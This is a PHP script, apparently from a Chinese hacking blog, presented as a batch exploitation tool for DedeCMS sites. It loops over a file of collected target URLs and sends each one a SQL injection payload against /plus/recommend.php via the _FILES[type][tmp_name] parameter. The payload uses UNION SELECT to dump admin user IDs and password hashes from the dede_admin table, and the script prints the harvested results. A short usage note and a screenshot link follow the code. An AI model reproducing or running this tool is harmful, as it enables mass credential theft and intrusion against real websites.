<?php print_r( " +------------------------------------+ DEDECMS批量爆菊利用工具 By :Sunshie QQ:1141056911求交流 Usage: $argv[0] Filename Example: php.exe $argv[0] url.txt url.txt是你采集的网址文件! +------------------------------------+ \r\n\r\n\r\n" ); $filename=$argv[1]; if(!file_exists($filename)) echo "o(╯□╰)o你妹的 你采集的文件呢?\r\n"; $conts = file_get_contents($filename); $arrConts = explode("\n",$conts); $arrConts=str_replace(" ","",$arrConts); $arrConts=str_replace("\r","",$arrConts); $arrConts=str_replace("\n","",$arrConts); //print_r($arrConts ); for($i=0;isset($arrConts[$i]);$i++){ echo fuckdede($arrConts[$i]); } function fuckdede($sb){ $sb=str_replace("http://","",$sb); $expp="http://".$sb."/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%[email protected]__admin`%23"; [email protected]_get_contents($expp); eregi("_<abc>(.*)</abc>_", $exp, $arr); $exploit=str_replace("_<abc>", "==fuck", $arr[0]); $exploit=str_replace("</abc>_", "fuck==", $exploit); return "网址:".$sb."注入结果 :".$exploit."\r\n--------------------------\r\n"; } ?>
<span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 14px; line-height: 1.5em;">以上代码保存为ANSI格式</span>
效果如下
<img alt="" src="http://www.hackqing.com/pic/image/20140304/20140304020823_50674.jpg" />